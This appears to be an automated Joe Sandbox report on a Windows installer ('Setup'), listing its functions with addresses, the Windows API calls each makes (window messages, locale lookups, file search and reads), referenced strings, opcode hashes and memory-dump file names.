Instruction ID: 5f98ff53420d7a3077f42ed6ee4e4a1183d3a07d01367196354862d693c04f48
Opcode Fuzzy Hash: afd5f9369bb080e75a066b52980b02005ad94e2deb1207fed81f2602d135a1e6
Instruction Fuzzy Hash: 5E429B70D0025ADFDB24CFA8CC45BAEBBB0FF55314F1042A9E458A7291EB746A85DF90

Function 00716D40 Relevance: 14.7, APIs: 5, Strings: 3, Instructions: 659windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00716E31

Part of subcall function 00911995: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119A0
Part of subcall function 00911995: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119DA

Part of subcall function 00911944: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 0091194E
Part of subcall function 00911944: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 00911981
Part of subcall function 00911944: WakeAllConditionVariable.KERNEL32(00A66A6C,?,?,006EB417,00A67624,009A5310), ref: 0091198C

SendMessageW.USER32(?,0000104D,00000000,?), ref: 00717333
SendMessageW.USER32(?,0000102B,00000000,0000000F), ref: 007173EB
SendMessageW.USER32(?,00001003,00000001,?), ref: 007174CF

Part of subcall function 00837750: __cftof.LIBCMT ref: 008377A0

SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00717689

Strings

AiFeatIco, xrefs: 007170BC
&_', xrefs: 00716D57
Icon, xrefs: 00717193

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend$ExclusiveLock$AcquireRelease$ConditionVariableWake__cftof
String ID: AiFeatIco$Icon$&_'
API String ID: 1739475930-2065630531
Opcode ID: 5add4db2191d7ec2fb03e572a06c511ae32c1a4ae3068b294bcc62bc454a3e88
Instruction ID: 870172670cc8f989955ae790303a20349dd6a6089428ace8a771ab7a0e6f0ecb
Opcode Fuzzy Hash: 5add4db2191d7ec2fb03e572a06c511ae32c1a4ae3068b294bcc62bc454a3e88
Instruction Fuzzy Hash: AF627870A00258DFDB28DF68CC48BDDBBB5BF89304F144199E459AB291DB746E84CF90

Function 00820FB0 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 389windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00821281
SendMessageW.USER32(?,00000443,00000000), ref: 008212F5
MulDiv.KERNEL32(?,00000000), ref: 0082132C

Strings

Segoe UI, xrefs: 00821303
NumberValidationTipMsg, xrefs: 0082114D
NumberValidationTipTitle, xrefs: 0082104B
&_', xrefs: 00820FDB

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSendWindow
String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI$&_'
API String ID: 701072176-925593799
Opcode ID: 33ac39d754f18aca34022d42216ae9199a99bb9edeb20d0a55681eb18444e3c3
Instruction ID: ff941bbf6601e5d9c442b47934e4e5e7b27e1ab8629175f098c57350814e6ca8
Opcode Fuzzy Hash: 33ac39d754f18aca34022d42216ae9199a99bb9edeb20d0a55681eb18444e3c3
Instruction Fuzzy Hash: 6FE1D231A00619AFDF18DF64CC59BEDB7B2FF89300F108249E559A72D1DB746A86CB90

Function 0088E410 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 203fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,-00000010,?,275F26E1,?,?,00000000), ref: 0088E4DC
FindNextFileW.KERNEL32(?,00000000,?,00000000), ref: 0088E4F7

Strings

&_', xrefs: 0088E42F

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FileFind$FirstNext
String ID: &_'
API String ID: 1690352074-2411122644
Opcode ID: 2484a54199db6783b278324164260d818bea748240e92cfa15b9a16220ad764f
Instruction ID: 86764c147eecc0187b538e4d76e038bf1dfbb1909c11937a2af88971cd108af0
Opcode Fuzzy Hash: 2484a54199db6783b278324164260d818bea748240e92cfa15b9a16220ad764f
Instruction Fuzzy Hash: 3181AB719002489FDF10DFA8CC48AEDBBB8FF09324F148669E825E7291DB75AE05CB50

Function 00892400 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 365fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,275F26E1,?,00883E80,00000000,?,?,?,00000000,00994705), ref: 0089245D
SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000), ref: 00892495
ReadFile.KERNEL32(00000000,00000000,0000000A,?,00000000), ref: 008924B7
CloseHandle.KERNEL32(?,?), ref: 008926B3

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Strings

&_', xrefs: 00892414, 00892735

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandlePointerProcessRead
String ID: &_'
API String ID: 4280942070-2411122644
Opcode ID: 538d657c81869fa2069c0ee091854096a0ef6c3a8eeb29ef9b09f673e1c24524
Instruction ID: 8d5306bf68c38ea7981ad6393310a65544528c31d7d8c6197fabbf703da40722
Opcode Fuzzy Hash: 538d657c81869fa2069c0ee091854096a0ef6c3a8eeb29ef9b09f673e1c24524
Instruction Fuzzy Hash: 71D1BD36A01208AFCF15DFA8D855BAEBBB5FF45724F29415DE812E7290DB30AD01DB90

Function 00934FF7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 009350FF
IsValidCodePage.KERNEL32(00000000), ref: 0093513D
IsValidLocale.KERNEL32(?,00000001), ref: 00935150
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00935198
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 009351B3

Strings

&_', xrefs: 00934FFF

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID: &_'
API String ID: 3475089800-2411122644
Opcode ID: 12f7a046afaed26867e2fa4f083ee296308db6a6f2f43fe07525975fdb23cc03
Instruction ID: dd079295de55b927cb3d8256268b8c294c2af5818bc6b798a9e2cee5ba35013c
Opcode Fuzzy Hash: 12f7a046afaed26867e2fa4f083ee296308db6a6f2f43fe07525975fdb23cc03
Instruction Fuzzy Hash: DE516D72A04615AFDB14DFA4DC41BBEB3B8FF48700F1A4429E914E7190E771DA408FA1

Function 00910FFD Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00910F19,00000000,?,009110B1,?,?,?,?), ref: 00910FFF
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,?,?), ref: 00911026
HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 0091102D
InitializeSListHead.KERNEL32(00000000,?,?,?,?), ref: 0091103A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?), ref: 0091104F
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00911056

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: ee1374edd08abd03960a3381c9e8e71268673cfd40b0435e6768eba162f1d208
Instruction ID: 88d76989cb3deae70ec95ac45f3d6c2ae040f146d09af5551eaf0dfed6195303
Opcode Fuzzy Hash: ee1374edd08abd03960a3381c9e8e71268673cfd40b0435e6768eba162f1d208
Instruction Fuzzy Hash: ABF0C832718211ABD7709FB99C09B07B7BCAF9A751F004428FA46D3250DB70C482ABA0

Function 00934654 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 271COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,?,?,?,?,?,00928D86,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0093471D
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00928D86,?,?,?,00000055,?,-00000050,?,?), ref: 00934754
GetLocaleInfoW.KERNEL32(00000000,00001002,?,00000078,-00000050,00000000,000000D0), ref: 009348C0

Strings

utf8, xrefs: 00934826
&_', xrefs: 0093487B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CodeInfoLocalePageValid
String ID: utf8$&_'
API String ID: 790303815-1736944033
Opcode ID: ed7bbc36ae05399e4ca6cd7d8356be85582db13bde9877d3b1686bf05427e998
Instruction ID: 398987a8301738566dd3311c385f75cc72024b0bad32661655695c5861b1b471
Opcode Fuzzy Hash: ed7bbc36ae05399e4ca6cd7d8356be85582db13bde9877d3b1686bf05427e998
Instruction Fuzzy Hash: DB71E672A00255AAEB24AF74CC86BBB73ACEF85744F164429F905DB181FB74FD408E91

Function 0087AA50 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

&_', xrefs: 0087AA7B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 70f8ce1807620ec1cadaf22c8d62e2be4c2aea09c56a461d4cbc83ea1e318ff9
Instruction ID: 6d0ff66950875ffa3feb19037b73908fe29a34b73d609abaf234427d014ad9ab
Opcode Fuzzy Hash: 70f8ce1807620ec1cadaf22c8d62e2be4c2aea09c56a461d4cbc83ea1e318ff9
Instruction Fuzzy Hash: 0B919C719052189FDB64DF68CC497ADBBB5FF44324F1482D8E829A7291DB709E80CF92

Function 00844440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 164fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,00000000), ref: 008444D2
FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000,?,?,00000000), ref: 00844574
FindClose.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 0084459E
FindClose.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 008445F7

Strings

&_', xrefs: 0084445F

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: &_'
API String ID: 2295610775-2411122644
Opcode ID: f7e1957f6b70a94ed14007b07191e4dbff3c3a64a4dcee8cf3851cd03ab9b8de
Instruction ID: 8bfcaa05fe5944dcc55f257b1d8d7b965a59f29629855949d85b30b9eea72e58
Opcode Fuzzy Hash: f7e1957f6b70a94ed14007b07191e4dbff3c3a64a4dcee8cf3851cd03ab9b8de
Instruction Fuzzy Hash: 0351FF74A0424DDBDF20DF68CC09BAEB7B4FF55328F248259E916E7280E7749A04CB94

Function 00934E15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,0093512D,00000002,00000000,?,?,?,0093512D,?,00000000), ref: 00934EAE
GetLocaleInfoW.KERNEL32(00000000,20001004,0093512D,00000002,00000000,?,?,?,0093512D,?,00000000), ref: 00934ED7
GetACP.KERNEL32(?,?,0093512D,?,00000000), ref: 00934EEC

Strings

OCP, xrefs: 00934E69
ACP, xrefs: 00934E33

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: a0f97bfe0468c672e167a6de1afebb492a1e5c69677597ff1a34320f0ba806f4
Instruction ID: 3eb4c6193507adc8c1db38b9803e10e3323cea9a041e335efd2d4c5c76b364b7
Opcode Fuzzy Hash: a0f97bfe0468c672e167a6de1afebb492a1e5c69677597ff1a34320f0ba806f4
Instruction Fuzzy Hash: E121A126704101AADB34CB54D901A97B3ABFF94B54F578464E90ADB150E732ED80CB50

Function 00718560 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 288windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000102B,00000000,?), ref: 0071868B
SendMessageW.USER32(?,0000102B,0000009B,-00000002), ref: 007188C8

Strings

Cxq, xrefs: 0071857F, 00718911
&_', xrefs: 00718577

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend
String ID: Cxq$&_'
API String ID: 3850602802-3087030254
Opcode ID: ce09a61759d108c8bc2f2c33d5034e289cd941188641bebaa09c4cf9a9531be7
Instruction ID: 4b416695cfcb667afc266a39f603fd44dd672579604982238ce958ee892e6cbd
Opcode Fuzzy Hash: ce09a61759d108c8bc2f2c33d5034e289cd941188641bebaa09c4cf9a9531be7
Instruction Fuzzy Hash: F7C18271A00206CFCF58CF58C895AEDBBF5FF58310F188169D859AF295DB38A981CB91

Function 007244D0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,275F26E1), ref: 0072458E
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 007245B3
GetLastError.KERNEL32 ref: 007245BD

Strings

&_', xrefs: 007244E7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DriveLogicalStrings$ErrorLast
String ID: &_'
API String ID: 573936702-2411122644
Opcode ID: 050a52ad6116fde9195c4a4af3788cd923673200a71fa5f1ee8bd357f4efd5d9
Instruction ID: 2262b24494708765f39a67cb1c0ce42f0f88c1f71a7c199b1bf7b29818cee909
Opcode Fuzzy Hash: 050a52ad6116fde9195c4a4af3788cd923673200a71fa5f1ee8bd357f4efd5d9
Instruction Fuzzy Hash: BCB19B71D00268DFCF20DFA4D808B9EBBB5BF55304F10469DE459AB281DB74AA48CF91

Function 00934A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00001002,?,00000078), ref: 00934AE7
GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00934B2B
GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00934BF5

Strings

&_', xrefs: 00934A9B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID: &_'
API String ID: 2299586839-2411122644
Opcode ID: 9bc807be99168626a95cf75add12785a05794791919f57ab8cba0cb6dd923643
Instruction ID: b3994c0cc5b7407d24fd07bf4100298c98793635cc73bc8da33aa4031606d21e
Opcode Fuzzy Hash: 9bc807be99168626a95cf75add12785a05794791919f57ab8cba0cb6dd923643
Instruction Fuzzy Hash: AB61AA75A412169FEB289F24CD82BBAB3ADEF44300F11817AED05C6285EB74ED81DF50

Function 0087AED0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 195fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,00000010), ref: 0087AF8C
FindClose.KERNEL32(00000000), ref: 0087B10F

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

%d.%d.%d.%d, xrefs: 0087B088
&_', xrefs: 0087AEE7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Find$AllocateCloseFileFirstHeap
String ID: %d.%d.%d.%d$&_'
API String ID: 1673784098-638995595
Opcode ID: df3aa27028f765c68c7f0566165b0378ed4b13fcc3468b5710c56b6afdb9a05f
Instruction ID: 9ed43c26183824a660334aa02ad54922b6862d5d286db80fa171b4822451bbf1
Opcode Fuzzy Hash: df3aa27028f765c68c7f0566165b0378ed4b13fcc3468b5710c56b6afdb9a05f
Instruction Fuzzy Hash: FE716A71A05259DFCF24DF68CC49BADBBB5FF44314F108299E419AB291CB759A84CF80

Function 008269A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,275F26E1,?,?), ref: 00826A5F
FindNextFileW.KERNEL32(000000FF,00000010), ref: 00826B6A
FindClose.KERNEL32(000000FF), ref: 00826BC5

Strings

&_', xrefs: 008269B7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
